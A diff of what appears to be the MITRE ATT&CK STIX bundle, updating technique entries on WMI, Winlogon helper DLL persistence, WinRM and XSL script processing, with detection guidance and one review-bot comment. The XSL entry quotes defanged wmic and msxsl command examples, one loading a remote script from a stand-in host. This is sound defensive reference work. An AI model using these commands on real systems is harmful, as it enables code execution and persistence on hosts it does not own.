+ "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf",
+ "description": "Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020."
+ },
{
"url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf",
"description": "Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.",
@@ -29035,28 +30046,28 @@
"phase_name": "execution"
}
],
- "modified": "2020-03-09T14:52:26.618Z",
+ "modified": "2020-05-13T22:50:51.258Z",
"created": "2017-05-31T21:30:44.329Z",
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.1",
+ "x_mitre_system_requirements": [
+ "WMI service, winmgmt, running.\nHost/network firewalls allowing SMB and WMI ports from source to destination.\nSMB authentication."
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_remote_support": true,
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
+ "x_mitre_detection": "Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect. Perform process monitoring to capture command-line arguments of \"wmic\" and detect commands that are used to perform remote behavior. (Citation: FireEye WMI 2015)",
"x_mitre_data_sources": [
"Authentication logs",
"Netflow/Enclave netflow",
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_detection": "Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect. Perform process monitoring to capture command-line arguments of \"wmic\" and detect commands that are used to perform remote behavior. (Citation: FireEye WMI 2015)",
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_remote_support": true,
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_system_requirements": [
- "WMI service, winmgmt, running.\nHost/network firewalls allowing SMB and WMI ports from source to destination.\nSMB authentication."
- ]
+ "x_mitre_version": "1.1",
+ "x_mitre_is_subtechnique": false
},
{
"external_references": [
@@ -29110,6 +30121,16 @@
"description": "Mandiant. (2015, February 24). M-Trends 2015: A View from the Front Lines. Retrieved May 18, 2016.",
"source_name": "Mandiant M-Trends 2015"
},
+ {
+ "source_name": "FireEye WMI SANS 2015",
+ "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf",
+ "description": "Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020."
+ },
+ {
+ "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf",
+ "description": "Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.",
+ "source_name": "FireEye WMI 2015"
+ },
{
"url": "https://www.secureworks.com/blog/wmi-persistence",
"description": "Dell SecureWorks Counter Threat Unit\u2122 (CTU) Research Team. (2016, March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016.",
@@ -29141,7 +30162,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Windows Management Instrumentation Event Subscription",
- "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015)\n\nAdversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)\n\nWMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.",
+ "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015)\n\nAdversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)\n\nWMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.",
"id": "attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -29154,23 +30175,23 @@
"phase_name": "persistence"
}
],
- "modified": "2020-03-24T14:58:13.113Z",
+ "modified": "2020-05-05T12:02:45.522Z",
"created": "2020-01-24T14:07:56.276Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM"
],
+ "x_mitre_detection": "Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence)\n\nMonitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1086) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"WMI Objects"
],
- "x_mitre_detection": "Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence)\n\nMonitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1086) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).",
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "attack-pattern--c3bce4f4-9795-46c6-976e-8676300bbc39",
@@ -29208,6 +30229,22 @@
"created": "2017-05-31T21:30:33.723Z"
},
{
+ "created": "2020-02-11T18:29:47.757Z",
+ "modified": "2020-03-25T12:25:03.014Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "lateral-movement"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65",
+ "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.\n\nWinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014)",
+ "name": "Windows Remote Management",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -29230,22 +30267,6 @@
"description": "French, D. (2018, September 30). Detecting Lateral Movement Using Sysmon and Splunk. Retrieved October 11, 2019."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Windows Remote Management",
- "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.\n\nWinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014)",
- "id": "attack-pattern--60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "lateral-movement"
- }
- ],
- "modified": "2020-03-25T12:25:03.014Z",
- "created": "2020-02-11T18:29:47.757Z",
"x_mitre_platforms": [
"Windows"
],
@@ -29312,10 +30333,15 @@
],
"modified": "2020-03-25T22:22:10.041Z",
"created": "2020-01-17T19:13:50.402Z",
- "x_mitre_contributors": [
- "Matthew Demaske, Adaptforward",
- "Travis Smith, Tripwire",
- "Pedro Harrison"
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_detection": "Monitor processes and command-line arguments for actions that could create or modify services. Command-line invocation of tools capable of adding or modifying services may be unusual, depending on how systems are typically used in a particular environment. Services may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. Remote access tools with built-in features may also interact directly with the Windows API to perform these functions outside of typical system utilities. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute commands or scripts. \n\nLook for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence.(Citation: TechNet Autoruns) \n\nCreation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft Windows Event Forwarding FEB 2018)). New, benign services may be created during installation of new software.\n\nSuspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. 
Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
+ "x_mitre_effective_permissions": [
+ "Administrator",
+ "SYSTEM"
],
"x_mitre_data_sources": [
"API monitoring",
@@ -29325,15 +30351,10 @@
"File monitoring",
"Windows Registry"
],
- "x_mitre_effective_permissions": [
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_detection": "Monitor processes and command-line arguments for actions that could create or modify services. Command-line invocation of tools capable of adding or modifying services may be unusual, depending on how systems are typically used in a particular environment. Services may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. Remote access tools with built-in features may also interact directly with the Windows API to perform these functions outside of typical system utilities. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute commands or scripts. \n\nLook for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence.(Citation: TechNet Autoruns) \n\nCreation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft Windows Event Forwarding FEB 2018)). New, benign services may be created during installation of new software.\n\nSuspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. 
Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Matthew Demaske, Adaptforward",
+ "Travis Smith, Tripwire",
+ "Pedro Harrison"
]
},
{
@@ -29367,6 +30388,26 @@
"created": "2017-05-31T21:30:20.148Z"
},
{
+ "created": "2020-01-24T16:59:59.688Z",
+ "modified": "2020-04-21T16:00:41.277Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35",
+ "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013) \n\nMalicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify - points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit - points to userinit.exe, the user initialization program executed when a user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell executed when a user logs on\n\nAdversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.",
+ "name": "Winlogon Helper DLL",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -29389,26 +30430,6 @@
"source_name": "TechNet Autoruns"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Winlogon Helper DLL",
- "description": "\nAdversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013) \n\nMalicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify - points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit - points to userinit.exe, the user initialization program executed when a user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell executed when a user logs on\n\nAdversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.",
- "id": "attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "persistence"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "privilege-escalation"
- }
- ],
- "modified": "2020-03-25T16:17:22.487Z",
- "created": "2020-01-24T16:59:59.688Z",
"x_mitre_platforms": [
"Windows"
],
@@ -29432,7 +30453,7 @@
"id": "attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "XSL Script Processing",
- "description": "Adversaries may bypass application whitelisting and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)\n\nAdversaries may abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. 
When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)\n\nCommand-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)\n\n* msxsl.exe customers[.]xml script[.]xsl\n* msxsl.exe script[.]xsl script[.]xsl\n* msxsl.exe script[.]jpeg script[.]jpeg\n\nAnother variation of this technique, dubbed \u201cSquiblytwo\u201d, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1117)/ \"Squiblydoo\" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)\n\nCommand-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)\n\n* Local File: wmic process list /FORMAT:evil[.]xsl\n* Remote File: wmic os get /FORMAT:\u201dhttps[:]//example[.]com/evil[.]xsl\u201d",
+ "description": "Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)\n\nAdversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. 
When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)\n\nCommand-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)\n\n* msxsl.exe customers[.]xml script[.]xsl\n* msxsl.exe script[.]xsl script[.]xsl\n* msxsl.exe script[.]jpeg script[.]jpeg\n\nAnother variation of this technique, dubbed \u201cSquiblytwo\u201d, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1117)/ \"Squiblydoo\" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)\n\nCommand-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)\n\n* Local File: wmic process list /FORMAT:evil[.]xsl\n* Remote File: wmic os get /FORMAT:\u201dhttps[:]//example[.]com/evil[.]xsl\u201d",
"external_references": [
{
"source_name": "mitre-attack",
@@ -29485,13 +30506,23 @@
"kill_chain_name": "mitre-attack"
}
],
- "modified": "2020-02-05T14:15:23.103Z",
+ "modified": "2020-06-20T22:45:46.479Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.2",
- "x_mitre_contributors": [
- "Avneet Singh",
- "Casey Smith",
- "Praetorian"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_system_requirements": [
+ "Microsoft Core XML Services (MSXML) or access to wmic.exe"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.\n\nThe presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.",
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Application control",
+ "Digital Certificate Validation"
],
"x_mitre_data_sources": [
"Process monitoring",
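Review bot: The `x_mitre_defense_bypassed` list added here carries the value `Application control` where the old object had `Application whitelisting` (the removal is in the following hunk), so anything in this repository that filters or groups techniques on that string will silently stop matching T1220. If such tooling exists it needs the same rename; if not, a one-line note in the commit message that ATT&CK renamed this value would save the next reader a grep. This looks like a refresh of the upstream MITRE CTI bundle rather than a hand edit, so the data itself should not be patched locally; note that `x_mitre_version` stays at `1.2` at the end of the next hunk despite the changed value, which is upstream's choice.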
@@ -29499,22 +30530,12 @@
"Process use of network",
"DLL monitoring"
],
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Application whitelisting",
- "Digital Certificate Validation"
+ "x_mitre_contributors": [
+ "Avneet Singh",
+ "Casey Smith",
+ "Praetorian"
],
- "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.\n\nThe presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_system_requirements": [
- "Microsoft Core XML Services (MSXML) or access to wmic.exe"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.2"
},
{
"id": "relationship--483a70b9-eae9-4d5f-925c-95c2dd7b9fa5",
@@ -29769,7 +30790,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44",
"type": "relationship",
- "modified": "2020-03-30T20:20:02.779Z",
+ "modified": "2020-07-07T16:44:26.672Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -29896,27 +30917,27 @@
],
"external_references": [
{
- "source_name": "Cymmetria Patchwork",
+ "url": "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf",
"description": "Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved August 3, 2016.",
- "url": "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf"
+ "source_name": "Cymmetria Patchwork"
},
{
- "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf",
+ "source_name": "TrendMicro Patchwork Dec 2017",
"description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.",
- "source_name": "TrendMicro Patchwork Dec 2017"
+ "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf"
}
],
"source_ref": "intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0",
"relationship_type": "uses",
"target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
- "modified": "2019-07-11T13:53:05.558Z",
+ "modified": "2020-06-29T15:54:17.677Z",
"created": "2017-05-31T21:33:27.077Z"
},
{
"id": "relationship--99e9583f-433d-437d-bf37-7ea2b3f1b613",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has compressed data into password-protected RAR archives prior to exfiltration.(Citation: Secureworks BRONZE BUTLER Oct 2017)",
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has compressed data into password-protected RAR archives prior to exfiltration.(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -29925,13 +30946,18 @@
"url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
"description": "Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.",
"source_name": "Secureworks BRONZE BUTLER Oct 2017"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
}
],
"source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
"relationship_type": "uses",
"target_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662",
"type": "relationship",
- "modified": "2020-03-30T01:58:00.081Z",
+ "modified": "2020-06-24T01:27:31.804Z",
"created": "2018-01-16T16:13:52.465Z"
},
{
@@ -30516,7 +31542,7 @@
],
"external_references": [
{
- "url": "https://www.emc.com/collateral/white-papers/h12756-wp-shell-crew.pdf",
+ "url": "https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf",
"description": "RSA Incident Response. (2014, January). RSA Incident Response Emerging Threat Profile: Shell Crew. Retrieved January 14, 2016.",
"source_name": "RSA Shell Crew"
}
@@ -30525,7 +31551,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab",
"type": "relationship",
- "modified": "2019-03-22T20:09:34.647Z",
+ "modified": "2020-04-17T21:11:30.416Z",
"created": "2017-05-31T21:33:27.043Z"
},
{
@@ -30659,22 +31685,27 @@
{
"id": "relationship--c87a8320-8705-4de3-93ee-2db5c00ea461",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has attempted to get users to launch malicious Microsoft Word attachments delivered via spearphishing emails.(Citation: Symantec Tick Apr 2016)",
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has attempted to get users to launch malicious Microsoft Word attachments delivered via spearphishing emails.(Citation: Symantec Tick Apr 2016)(Citation: Trend Micro Tick November 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan",
+ "source_name": "Symantec Tick Apr 2016",
"description": "DiMaggio, J. (2016, April 28). Tick cyberespionage group zeros in on Japan. Retrieved July 16, 2018.",
- "source_name": "Symantec Tick Apr 2016"
+ "url": "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
}
],
"source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
"relationship_type": "uses",
"target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
"type": "relationship",
- "modified": "2020-03-16T16:19:59.278Z",
+ "modified": "2020-06-24T01:27:31.920Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -30712,12 +31743,12 @@
"url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
}
],
- "source_ref": "malware--d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5"
},
{
"id": "relationship--145634d0-cd6c-4184-965a-fe77a158ff97",
@@ -30728,7 +31759,7 @@
],
"external_references": [
